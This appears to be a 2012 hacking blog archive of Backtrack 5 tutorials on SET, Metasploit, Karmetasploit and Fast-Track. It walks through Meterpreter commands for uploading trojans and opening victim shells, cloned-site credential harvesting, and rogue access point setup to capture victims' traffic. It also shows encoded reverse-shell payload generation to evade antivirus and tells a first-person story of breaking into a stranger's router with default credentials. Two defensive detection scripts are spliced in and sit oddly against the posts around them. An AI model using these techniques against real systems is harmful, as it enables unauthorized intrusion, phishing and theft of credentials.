
Tuesday, August 14, 2012

Backtrack 5 R3 Facebook Hacking Real!!!

Hi guys,
This video tutorial is about Facebook hacking; in it I show how to hack a Facebook account using Backtrack 5 R3.


Don't forget to join us on

FACEBOOK FAN PAGE www.facebook.com/sundaravelit

Join our group for help: www.facebook.com/groups/hackinghelp

Keep visiting for more Backtrack 5 R3 tutorials.

Wednesday, March 21, 2012

Learn to use Metasploit – Tutorials, Docs & Videos

Metasploit is a great tool for hacking, but it’s not the easiest to use, and some people get completely lost when trying to get the most out of it.




Here I am sharing a bunch of links, video tutorials and documents to get you up to speed.
You can start with this, a good tutorial that shows you step by step how to use it:
Metasploit at Iron Geek
This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability.
There’s a presentation by HD Moore himself at CanSecWest 2006:
csw06-moore.pdf
And a couple of videos spawned from that here:
Computer defense – TASK Presentation
The most up to date video for Metasploit 3 can be found here:
Exploring Metasploit 3 and the New and Improved Web Interface – Part 1
Exploring Metasploit 3 and the New and Improved Web Interface – Part 2
The Metasploit site itself also has some fantastic documentation, a good place to start is here:
http://framework.metasploit.com/msf/support
The Metasploit book is a good start too:
Using Metasploit
The Security Focus article is a good reference too if a little outdated:
Metasploit Framework, Part 1
Metasploit Framework, Part 2
So get hacking, Metasploit is great!

Saturday, February 4, 2012

Social Engineering toolkit Tutorial-Backtrack 5


Social engineering, also known as human hacking, is the act of manipulating the human mind to achieve a desired goal. Social engineering is a general term, and in daily life everyone uses it, but its use in hacking and penetration testing is a little different. The main uses of social engineering in hacking are to gather information, maintain access, and so on.

There are various social engineering tips and tricks available on the Internet; besides these tips there is a Social Engineering Toolkit available for carrying out computer-based social engineering attacks.

What Is Social Engineering Toolkit


In this article I will discuss the usage of the Social Engineering Toolkit on Backtrack 5 to hack a Windows operating system, but before going to the actual tutorial I want to share a basic introduction to the Social Engineering Toolkit that will really help beginners.
The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
The Social-Engineering Toolkit is available on Backtrack (such as Backtrack 5), BackBox, Blackbuntu, GnackTrack and other Linux distributions that are used for penetration testing.

Download


If you are using some other Linux distribution, use this command to get SET:
svn co http://svn.secmaniac.com/social_engineering_toolkit set/

Social Engineering Toolkit Tutorial

Well, for this tutorial I am using Backtrack 5, and the tutorial will teach you a single method to own a computer using the SET toolkit; more SET tutorials will be posted in later articles. For the best result I have made a video tutorial.
As I said in the video, more of the commands are in the article, so here are the necessary commands.
ps
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Download
meterpreter > download c:\\boot.ini
Upload
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Execute
meterpreter > execute -f cmd.exe -i -H
shell
If you want to get the DOS prompt of the victim PC for downloading and uploading your backdoor and other jobs, use shell.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy the article, then drop your comments.

Credential Harvester Attack Method- SET Backtrack 5


The Social Engineering Toolkit has played and is playing an important role in the field of information security and ethical hacking; social engineering means taking advantage of human weakness to hack a computer system or a server. The Social Engineering Toolkit is computer-based software that is also available on Backtrack 5.

Backtrack is not the only Linux distribution that contains SET; other distributions like GnackTrack and BackBox also have SET. In the Social Engineering Toolkit tutorial we learnt how to get meterpreter and shell access on a computer; in this tutorial I will explain the credential harvester attack method.

What is the Credential Harvester Attack Method

The credential harvester attack method is used when you don’t want to specifically get a shell but want to perform phishing attacks in order to obtain usernames and passwords from the system. In this attack vector, a website is cloned, and when the victim enters their user credentials, the usernames and passwords are posted back to your machine and the victim is then redirected back to the legitimate site.

So for this tutorial I will integrate the Mass Mailer Attack with the credential harvester attack.
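The flow just described (credentials posted to the cloned page, then a redirect to the real site) leaves a recognisable trace in outbound web logs. The script below is an added example written for this post, not part of the original article or of SET: it parses a few constructed proxy log lines and flags a client that POSTs a form to a host outside the organisation's known login sites and, within a short window, lands on one of those legitimate login hosts. The log format, the hosts and the LEGIT_LOGIN_HOSTS allowlist are all assumptions.

```python
from urllib.parse import urlparse

# Constructed web-proxy log lines (not real data): "epoch client method url status".
# Client 10.0.0.23 posts a login form to a bare IP address and is immediately
# bounced to the real login site, the sequence a credential-harvester page produces.
SAMPLE_LOG = """\
1328400001 10.0.0.23 GET http://192.168.1.50/ 200
1328400008 10.0.0.23 POST http://192.168.1.50/login.php 302
1328400009 10.0.0.23 GET https://login.example.com/ 200
1328400200 10.0.0.24 POST https://login.example.com/session 200
1328400300 10.0.0.25 POST http://intranet.example.com/search 200
1328400330 10.0.0.25 GET https://login.example.com/ 200
"""

# Assumption: the login sites whose clones we care about.
LEGIT_LOGIN_HOSTS = {"login.example.com"}


def parse_log(text):
    """Turn the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status = line.split()
        events.append({
            "ts": int(ts),
            "client": client,
            "method": method,
            "host": urlparse(url).hostname,
            "status": int(status),
        })
    return events


def find_harvester_candidates(events, legit_hosts=LEGIT_LOGIN_HOSTS, window=15):
    """Return (client, post_host, legit_host) tuples for every POST to a host
    outside legit_hosts that is followed, within `window` seconds by the same
    client, by a request to a legitimate login host."""
    by_client = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_client.setdefault(e["client"], []).append(e)

    hits = []
    for client, evs in by_client.items():
        for i, e in enumerate(evs):
            if e["method"] != "POST" or e["host"] in legit_hosts:
                continue
            for later in evs[i + 1:]:
                if later["ts"] - e["ts"] > window:
                    break  # events are time-sorted, nothing later can match
                if later["host"] in legit_hosts:
                    hits.append((client, e["host"], later["host"]))
                    break
    return hits


if __name__ == "__main__":
    for client, bad_host, legit in find_harvester_candidates(parse_log(SAMPLE_LOG)):
        print(f"{client}: form posted to {bad_host}, then redirected to {legit}")
```

Only the first client is flagged with the default 15-second window; the third client's POST to the intranet host is 30 seconds before its login request and is ignored. A redirect status on the POST (302 in the sample) strengthens the signal, and an allowlist of internal form handlers keeps legitimate intranet traffic out of the results.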

Requirement

  • Operating system
  • Social Engineering Toolkit
  • A brain

Any operating system is applicable for this type of attack, but I am using Backtrack 5. It is good practice to make a video tutorial instead of images and text, so here is the video tutorial of the Social Engineering Toolkit mass mailer attack with the harvester attack method.

SET Video Tutorial


Autopwn Metasploit Backtrack 5- Postgresql Solved


Metasploit is one of the best databases and a piece of software that has a list of exploits for different software; nmap is a great network scanner tool, and when we integrate Metasploit and nmap with each other we get a wonderful combination that is really helpful in the process of penetration testing and ethical hacking.

Besides nmap we can also import Nessus results into Metasploit, and this was discussed in an earlier tutorial, but we got many comments and messages that PostgreSQL is not working with Metasploit on Backtrack 5, so here is another video tutorial that shows how to use the PostgreSQL server with Metasploit on Backtrack 5.

The tutorial will also teach you about Metasploit autopwn using nmap results. After this tutorial you can say that the problem of PostgreSQL with Metasploit has been solved.

Postgresql Metasploit Autopwn Backtrack Tutorial


Friday, February 3, 2012

Karmetasploit- Backtrack 5 Tutorial


Wireless communication has now become a networking necessity; radio signals are unseen, but they carry your information in the form of bits using different modulation techniques. However, security is very important for a wireless network because it is more vulnerable. As discussed before about wireless security and rogue access points, in this article I will try to cover Karmetasploit.

Metasploit is now one of the best tools for penetration testing, and the word Karmetasploit is derived from two words: one is KARMA (KARMA Attacks Radioed Machines Automatically) and the other is Metasploit.

So what is Karmetasploit?

KARMA is a wireless client attack toolkit, and the integration of KARMA and Metasploit is called Karmetasploit. In 2004 Dino A. Dai Zovi and Shane A. Macaulay gave a presentation called "All your layer are belong to us" in which they described the insecurity of wireless access points and introduced the tool KARMA. This tool acts as a wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.

The above passage gives a basic introduction to KARMA; about Metasploit you can learn from here.
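The defining behaviour of a KARMA access point, answering probe requests for whatever SSID a client asks for, is also what gives it away to a wireless monitor. The script below is an added example for this post, not code from the original article or from the KARMA or Metasploit projects: it takes a constructed summary of 802.11 beacon and probe-response frames (as a monitor-mode capture might be reduced to) and reports any BSSID that answers for SSIDs it never advertises in its own beacons. The frame records, BSSIDs and SSIDs are all made up for the example.

```python
from collections import defaultdict

# Constructed management-frame summary (not captured data). A beacon advertises
# the SSID an AP really offers; a probe response answers one client's probe
# request for a named SSID.
SAMPLE_FRAMES = [
    {"type": "beacon",     "bssid": "00:11:22:33:44:55", "ssid": "OfficeWiFi"},
    {"type": "probe-resp", "bssid": "00:11:22:33:44:55", "ssid": "OfficeWiFi",
     "client": "aa:bb:cc:00:00:01"},
    # Second AP beacons one name but answers every probe it hears.
    {"type": "beacon",     "bssid": "66:77:88:99:aa:bb", "ssid": "U R PWND"},
    {"type": "probe-resp", "bssid": "66:77:88:99:aa:bb", "ssid": "HomeNet",
     "client": "aa:bb:cc:00:00:01"},
    {"type": "probe-resp", "bssid": "66:77:88:99:aa:bb", "ssid": "CoffeeShop",
     "client": "aa:bb:cc:00:00:02"},
    {"type": "probe-resp", "bssid": "66:77:88:99:aa:bb", "ssid": "AirportFree",
     "client": "aa:bb:cc:00:00:03"},
    {"type": "probe-resp", "bssid": "66:77:88:99:aa:bb", "ssid": "OfficeWiFi",
     "client": "aa:bb:cc:00:00:01"},
]


def find_karma_candidates(frames, min_unadvertised=2):
    """Return {bssid: sorted SSIDs} for every BSSID that sent probe responses
    for at least `min_unadvertised` SSIDs it never announced in a beacon.

    A genuine AP answers only for the network names it beacons (one or a few);
    a KARMA-style AP answers for any name a client probes for."""
    advertised = defaultdict(set)   # bssid -> SSIDs seen in beacons
    answered = defaultdict(set)     # bssid -> SSIDs seen in probe responses
    for f in frames:
        if f["type"] == "beacon":
            advertised[f["bssid"]].add(f["ssid"])
        elif f["type"] == "probe-resp":
            answered[f["bssid"]].add(f["ssid"])

    suspects = {}
    for bssid, ssids in answered.items():
        unadvertised = ssids - advertised.get(bssid, set())
        if len(unadvertised) >= min_unadvertised:
            suspects[bssid] = sorted(unadvertised)
    return suspects


def clients_exposed(frames, bssid):
    """Sorted list of client MACs that received probe responses from `bssid`;
    useful for knowing which devices to warn once an AP is flagged."""
    return sorted({f["client"] for f in frames
                   if f["type"] == "probe-resp" and f["bssid"] == bssid})


if __name__ == "__main__":
    for bssid, names in find_karma_candidates(SAMPLE_FRAMES).items():
        print(f"{bssid} answered for unadvertised SSIDs {names}; "
              f"clients seen: {clients_exposed(SAMPLE_FRAMES, bssid)}")
```

With the sample frames only the second BSSID is reported. The threshold exists because a legitimate AP that recently changed its SSID, or one whose beacon was simply not captured, can show one unadvertised name; several different names answered for several different clients is the KARMA pattern. Wireless intrusion detection systems apply the same idea on live captures.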

Karmetasploit Tutorial
Configuration 

If you are not using Backtrack 5 then you must install some dependencies like Aircrack-ng:
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install 
# airmon-ng start [wifi-interface]
For Backtrack, like Backtrack 5, follow this procedure:
root@bt:/pentest/exploits/framework3# wget http://www.offensive-security.com/downloads/karma.rc
Now we need to configure a DHCP server so that the fake AP can connect clients to the network.
root@bt:/pentest/exploits/framework3# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
root@bt:~# gem install activerecord sqlite3-ruby
By now we are approximately done; now it is time to restart the wireless interface and start listening.
root@bt:~# airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1
What do these commands do? They create a new interface that is the rogue interface, or fake AP. Now we have to assign an IP address and the DHCP configuration so that the interface works properly.
root@bt:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root@bt:~# ps aux | grep dhcpd
Karmetasploit Attack Vector 
After configuration you are ready to run Karmetasploit and start an attack:
root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc 
The command will start Metasploit, and then the Karma script starts acting as a fake AP and gives you a prompt like this:
msf auxiliary(http) >
When the victim starts using this AP you are free to monitor all the activity and you can record the confidential information.
msf auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.google.com)
This is a slightly advanced tutorial, and if you don't understand it then it means you have to understand rogue access points first.

Metasploit 4 Advance Penetration Testing Tool


Metasploit has changed the way of penetration testing; it provides a complete automated environment for attacking, finding vulnerabilities and their exploits. As discussed before about the advantages of automated penetration testing, for automated tests Metasploit is the best tool. You can find the complete description with basic usage of Metasploit here.

The newer version of Metasploit is version 4, which will be released very soon, so in this article I will try to discuss the features of Metasploit 4.

According to the official blog the new version contains 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules. The new version also contains exploits for browsers like Firefox and Internet Explorer, and an improved 64-bit Linux payload. Some more features are:
  • Increased exploitation speed
  • Updated social engineering campaigns, including the ability to clone existing websites and edit HTML in a rich editor
  • Updated user interface to simplify managing large projects
  • Easily re-run tasks that have been aborted by the user
  • Global settings for configuring NeXpose scan engines, macros, and API keys
The new version provides advanced options for importing different scan results from third-party web application scanners and vulnerability assessment tools. If you want to import Nessus results into Metasploit, follow the link to learn how.

Metasploit 4 also provides an offline password cracking function; for this purpose Metasploit uses John the Ripper to crack weak passwords. You can even integrate Metasploit Pro with your Security Information and Event Management (SIEM).

There are various ways to deploy Metasploit; for example, you can now deploy Metasploit as a VMware image using VMware vSphere. Session establishment is not a big problem now: Meterpreter supports persistent agents and listeners so that the target machine actively re-establishes a session when it drops. Agents automatically expire after a pre-configured amount of time.

Fast Track Hacking-Backtrack5 Tutorial


Backtrack 5 contains different tools for exploitation; as discussed before about Metasploit and Armitage, in this article I will discuss Fast-Track. However, I have received several requests to write more tutorials for Armitage, so I will write about Armitage too later. Fast-Track is a compilation of custom developed tools that allow penetration testers to apply advanced penetration techniques in a relatively easy manner.

Some of these tools utilize the Metasploit framework in order to successfully create payloads, exploit systems, or interface within compromised systems.

If you are a beginner and don't have any idea about vulnerabilities, payloads and shellcode, first read the article "Introduction to Metasploit".

For this tutorial I will use Backtrack 5; however, you can use some other version(s).
How To Use Fast-Track For Payload Generation
There are three interfaces available for Fast-Track on Backtrack 5. I will show you how to generate a payload using Fast-Track; you can use the Fast-Track web interface too for different purposes like autopwn. Follow the procedure.
  • Click on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive
  • You will get the first window, which is the menu window; enter number 8, the payload generator option.
  • The next window will ask you about the payload; enter number 2, which is "Reverse_TCP Meterpreter".
  • Now we need to encode our payload so that it can more easily bypass antivirus software and IDS. I entered number 2; you can enter the one of your choice.
  • Next we have to enter the IP address of the victim, then the port number. I scanned my local network using nmap; click here to learn nmap. Then select the type of payload, either EXE or shellcode.
  • Now a file named payload.exe has been created; you can get the file by going to filesystem-->pentest-->exploit-->fasttrack-->payload.exe.
  • Use some social engineering technique to run this payload on the victim box, then in the Fast-Track window start listening for your payload to get the hack done. When everything is fine you will get the command window of the victim.

Integrate Nessus With Metasploit- Tutorial


There are so many tools, but the importance of Nessus as a vulnerability scanner is no secret, and Metasploit, the master of all the tools, containing the available exploits, is just as important for penetration testing and for hacking. As discussed before about the integration of nmap into Nessus, click here to learn.

This time we have decided to write on how to use Metasploit on the basis of Nessus results. You can use your Linux box (recommended) as well as a Windows box; Backtrack 5 is available, so if you are practising on a Backtrack machine that is good, while I am using Ubuntu for this tutorial.

This tutorial is linked with the previous tutorial in which I showed you how to use Nessus; now I suppose that you have a result in your Nessus, so start Metasploit:
$ msfconsole
In this process we use the Nessus Bridge for Metasploit, so in Metasploit type:
msf > load nessus

After successfully loading the plugin you need to run and import the results of Nessus into Metasploit, so first of all we have to connect our Nessus server with Metasploit; here is the command:
msf > nessus_connect username:password@hostname:port
msf > nessus_connect ehacking:irfan@127.0.0.1:8834
After successful authentication you can check the status of your Nessus scan, check the policy, pause and resume the scan, view, add and delete users, and in general do anything that you can do in the Nessus window.
If you want to check the server status then type:
msf > nessus_server_status
Now come to the main objective of the article; the command below lists all the reports:
msf > nessus_report_list
If you want to know about the hosts in a report:
msf > nessus_report_hosts <report id>
msf > nessus_report_hosts a6656thy45ehacking
If there is a need to find out information about a particular host, use the command below:
msf > nessus_report_host_ports <hostname> <report id>
msf > nessus_report_host_ports 192.168.1.1 a6656thy45ehacking
You can do a lot of different things with the Nessus Bridge for Metasploit; just type the command below to learn more about it:
msf > nessus_help

How I Hacked A Remote Computer By Just IP Address



Hacking a remote computer is always a hot topic among hackers and crackers; a newbie hacker or someone who wants to learn hacking always asks how to hack into a computer by just knowing the IP address. Although we have discussed so many methods before, I always insist on learning some basic commands, protocols and their usage. This is my story of how I hacked into a remote computer by just using the IP address (I have not downloaded any file, and I have not even cleared the logs). This story was not planned, it just happened, and I am sure you will like it and you will learn a lot of things if you don't know the basic commands and protocols.

It was Saturday night and I was working hard on a Social Engineering Toolkit remote attack (WAN, Internet attack), which is why I was playing with my router for port forwarding and other stuff; remember my ISP uses a dynamic mechanism, so I had created a DNS server to get a static IP. It was almost night and I decided to get some sleep, so I saved my browser tabs so that next time I could use them.

On Sunday evening I opened my browser and the previous tabs opened automatically, and then I got a pop-up window asking for the username and password of my router. I looked at the address bar: the IP address was the same as the one I had saved. I was shocked that my ISP had not changed my WAN IP (remember the ISP uses dynamic IPs). After this I opened a website like whatismyip and saw that my IP was different; it means the window asking for the username and password was at the IP of another computer.

I just got an idea: why not brute force it and get access to the victim router? Hydra has been discussed before, but before brute forcing I decided to use the guessing technique. I entered so many combinations but failed, then I just used the default username and password and hurrah, I was in.

Security was very low, so I did a quick nmap scan to get the open ports (remember I had turned off the firewall of the victim router). According to the nmap result FTP and telnet were open, and then I realized how vulnerable this victim was.

I went to my terminal and opened telnet to the victim using the default password and I was in; now I was able to take control of this computer, but this was not included in the plan.

FTP (file transfer protocol): I went to my terminal again and this time I used the FTP command with the same combination of username and password and succeeded. Remember, FTP access means you can download and upload files on the remote computer, which means full access. You can use some GUI FTP client, but I used the command line.



Countermeasures

  • Always use a strong password
  • Turn on your firewall (both on the router and the computer)